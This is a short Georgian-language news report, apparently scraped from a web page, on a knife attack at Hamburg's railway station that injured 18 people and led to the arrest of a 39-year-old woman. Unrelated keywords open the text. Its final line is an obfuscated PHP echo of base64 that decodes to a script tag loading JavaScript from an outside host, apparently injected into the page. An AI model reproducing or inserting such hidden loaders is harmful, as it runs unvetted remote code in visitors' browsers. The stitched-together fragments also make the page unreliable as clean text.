gorgia
jaluzi

გერმანიის ქალაქ ჰამბურგში დანით თავდახმის შედეგად 18 ადამიანი დაშავდა, - ამის შესახებ ინფორმაციას სააგენტო Reuters-ი გერმანულ მედიაზე დაყრდნობით ავრცელებს.

ქალაქ ჰამბურგის პოლიციის ცნობით, თავდასხმა პარასკევს საღამოს ქალაქის რკინიგზის სადგურზე მოხდა, ხოლო თავდამსხმელი დაკავებულია.

გერმანული გამოცემა Bild-ის ინფორმაციით, დაშავებულთაგან ოთხი კრიტიკულ მდგომარეობაშია, ხოლო ექვსი მათგანი მძიმედ არის დაჭრილი.

პოლიციის განცხადებით, თავმდამსხმელი 39 წლის ქალია.

„ჯერჯერობით არ გვაქვს მტკიცებულება იმისა, რომ ქალი პოლიტიკური მოტივით მოქმედებდა“, - განაცხადა ჰამბურგის პოლიციის პრესსპიკერმა, ფლორიან აბენსეტმა.

163
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");